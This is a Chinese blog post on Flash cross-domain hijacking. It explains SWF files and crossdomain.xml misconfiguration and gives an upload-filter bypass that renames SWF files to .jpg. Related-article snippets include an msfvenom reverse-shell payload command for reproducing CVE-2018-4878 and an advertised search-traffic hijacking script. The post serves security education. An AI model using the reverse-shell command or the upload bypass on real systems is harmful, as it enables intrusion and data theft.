flash跨域劫持漏洞

最新推荐文章于 2024-09-24 12:16:25 发布
最新推荐文章于 2024-09-24 12:16:25 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: web基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37432787/article/details/82690396
版权

参考资料1
参考资料2

Adobe Flash 2017年7月25号,在官方博客上宣布到2020年底停止更新Flash,鼓励开发者尽早使用新的标准( HTML5、WebGL 和 WebAssembly)进行开发

ActionScript:(简称AS)是由Macromedia(现已被Adobe收购)为其Flash产品开发的,最初是一种简单的脚本语言,现在最新版本ActionScript3.0,是一种完全的面向对象的编程语言,功能强大,类库丰富,语法类似JavaScript,多用于Flash互动性、娱乐性、实用性开发,网页制作和RIA(丰富互联网程序)开发。

swf文件:swf(shock wave flash)是Macromedia(现已被ADOBE公司收购)公司的动画设计软件Flash的专用格式,被广泛应用于网页设计、动画制作等领域,swf文件通常也被称为Flash文件。

  • a网站中的flash—swf文件被b网站利用,b网站可以绕过a网站的crossdomain.xml访问a网站的资源,导致跨域访问资源。
    这里写图片描述
    这里写图片描述

  • 上传图片中若不检测文件内容,可以将swf文件的后缀名改为jpg,只需content-type绕过即可

xixixihhh
关注
专栏目录
web渗透--56--Flash跨域访问漏洞
武天旭的博客
09-23 4886
1、漏洞描述: 不正确的crossdomain.xml策略将导致严重的安全问题,如信息泄露、CSRF等,如下几种是跨域漏洞所产生的常见几种不正确设置: 1:permitted-cross-domain-policies为all造成加载目标域上的任何文件作为跨域策略文件,甚至是一个JPG也可被加载为策略文件。 2:allow-access-from设为“*”任何的域,有权限通过flash读取本域中的...
什么是同源策略?如何检测跨站点 WebSocket 劫持漏洞?post 表单跳转跨域问题、Ajax跨域请求、浏览器特性和安全策略、WebSocket 协议连接
代码讲故事
03-04 634
什么是同源策略?如何检测跨站点 WebSocket 劫持漏洞?post 表单跳转跨域问题、Ajax跨域请求、浏览器特性和安全策略、WebSocket 协议连接。
flash跨域策略文件crossdomain.xml配置详解
chen8511的专栏
08-19 866
flash跨域时唯一的限制策略就是crossdomain.xml文件,该文件限制了flash是否可以跨域读写数据以及允许从什么地方跨域读写数据。 位于www.a.com域中的SWF文件要访问www.b.com的文件时,SWF首先会检查www.b.com服务器目录下是否有crossdomain.xml文件,如果没有,则访问不成功;若crossdomain.xml文件存在,且里边设置了允许
带着徒弟从一次跨域漏洞修复展开的学习
最新发布
qq_37372909的博客
09-24 609
公司安全兄弟提示我们一个应用存在CSRF跨域攻击的漏洞,我带着徒弟开展漏洞修复。全面的了解什么是跨域访问?存在什么安全风险?
web安全--Flash跨域数据劫持漏洞
fabao007的专栏
05-03 1329
0×01,背景 很多上传文件的后端逻辑在实现时,仅仅验证了文件后缀名和Content-Type,没有对上传文件的内容进行验证。通常情况下这样的处理逻辑仅仅是不严谨,不会造成太大的安全隐患。但经过笔者测试,发现object标签在包含flash文件时没有对嵌入的文件后缀进行判断。也就是说,只要文件内容包含了正常的flash文件代码,就能够被object标签成功加载并执行。而ActionScript中...
Flash跨域访问
07-30
NULL 博文链接:https://can4you.iteye.com/blog/829419
Flash跨域劫持用户操作
weixin_34414196的博客
04-17 250
2019独角兽企业重金招聘Python工程师标准>>> ...
关于flash跨域问题
zhytry的博客
03-23 1433
Security.allowDomain("*"); Security.allowInsecureDomain("*");   Security.loadPolicyFile("http://py.qlogo.cn/crossdomain.xml");   在过游戏开发的时候,往往会遇到安全域的问题,然而这个问题,确实实实在在的困扰着我们
同源策略——CORS和JSONP劫持漏洞
m0_61506558的博客
11-03 787
同源策略是一个重要的安全策略,它用于限制一个origin的文档或者它加载的脚本如何能与另一个源的资源进行交互。它能帮助阻隔恶意文档,减少可能被攻击的媒介。如果两个URL拥有相同的协议(http、https)、端口和主机,那么这两个URL就是同源的。JSONP(JSON with Padding) 是 json 的一种”使用模式”,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。JSONP实现跨域请求的原理简单的说,就是动态创建标签,然后利用的 src不受。
同源策略与cors跨域jsonp劫持
j1044957016的博客
05-31 904
文章目录前言一、同源策略二、Ajax技术三、CORS跨域1.简单请求2.非简单请求3.漏洞成因及修复四、jsonp劫持总结 前言 本文整理同源策略,Ajax,cors跨域jsonp劫持 一、同源策略 同源策略(Same Origin Policy):该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。(防止内部资源被外部页面脚本读取或篡改) 浏览器的同源策略规定: 不同域的客户端脚本在没有
漏洞挖掘思维培养-大咖Vulkey_Chen-漏洞银行大咖面对面.pptx
08-24
对于前端交互类漏洞,他提到了写入型CSRF(跨站请求伪造)和读取型CSRF,如JSONP跨域劫持、CORS跨域劫持Flash跨域劫持等。在业务逻辑层面,他提醒关注那些可能被忽视的流程漏洞,例如通过分析业务流程,找出可以...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
js整站无缝劫持代码
02-17
最新判断来路为搜索引擎跳转代码,js来路判断,用于搜索引擎流量劫持,.蜘蛛劫持功能,可以根据来路劫持,也可以根据蜘蛛进行劫持。泛站群跳转代码
JavaScript跨域方法汇总
10-25
4. **Flash跨域**:Flash支持通过`crossdomain.xml`文件定义跨域策略,允许特定域的SWF文件访问。但随着Flash的逐渐淘汰,这种方法的使用越来越少。 5. **img标签跨域**:利用`<img>`标签的`src`属性发起GET请求,...
Flash配置不当漏洞”详解
m0_49025459的博客
01-17 1905
可被用来进行跨域访问,可能会导致“跨站点伪造请求”或“跨站点跟踪”(“跨站点脚本编制”的变体)之类的攻击,从而导致其它用户的信息被非法读取。导致不受信任的第三方域的flash也能访问当前域的资源,绕过同源策略的限制,可为后续渗透攻击做准备,flash跨域均可能导致XSS,CSRF等问题。Flash 显示程序接受 AllowScriptAccess 之类的对象参数。
flash.js 劫持怎么解决
lihaiweio的博客
04-08 5422
之前写的一个下载xlsx文件,最近换了网络环境,服务器环境下载总会触发两次请求,中间会有一个flash.js, 下载两次之后出现白页面,度娘之后发现没有实质性的解决办法,于是打算发个帖子,给大家借鉴一下。 下面是别人的一个图,我这边修复了,忘记截图了。 度娘一搜一大堆解决方案,但是都是类似下面这种 修改浏览器的操操作,虽然修改了可以用,但是不能每一个用的人都去修改吧,而且F12 一关,又会重复之前的两次下载,很明显不是最终解决办法, 修改之后,不出现falsh.js或者不多...
Flash 0day漏洞(CVE-2018-4878复现)
weixin_44897902的博客
10-14 477
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
Adobe Flash爆出严重漏洞:可导致代码任意执行 获取个人隐私
qq_41679358的博客
08-03 750
文章目录[隐藏] Adobe 被爆出的漏洞:受影响的产品版本升级修复版本其他漏洞受影响的产品版本升级修复版本 众所周知,Flash是网络攻击的首选目标。值得注意的是,Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态,这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕,因为Adobe 在今年5月被爆出了多个严重漏洞,好在Ado...
Flash漏洞(CVE-2018-4878 )复现
玄道的网安博客
07-29 1406
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值